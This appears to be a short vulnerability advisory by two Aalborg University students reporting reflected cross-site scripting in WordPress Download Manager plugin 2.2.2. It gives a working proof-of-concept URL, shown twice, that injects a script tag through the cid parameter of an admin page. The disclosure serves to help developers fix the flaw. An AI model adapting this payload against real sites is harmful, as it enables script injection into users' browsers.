WordPress Download Manager plugin version 2.2.2 suffers from a cross site scripting vulnerability.
6a8c7f4f0b0844b8f018c2725f03b854edac1e6373b0344d67832b20fe66fb05
Hi
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.
Module: Download Manager
Version: 2.2.2
Confirmed exploits:
EXPLOIT
http://wp.bacon/wp-admin/admin.php?page=file-manager/categories&cid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
EXPLOIT:
http://wp.bacon/wp-admin/admin.php?page=file-manager/categories&cid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Best Regards
Heine Pedersen and Torben Jensen
Student project group: sw101f12
Aalborg University
Denmark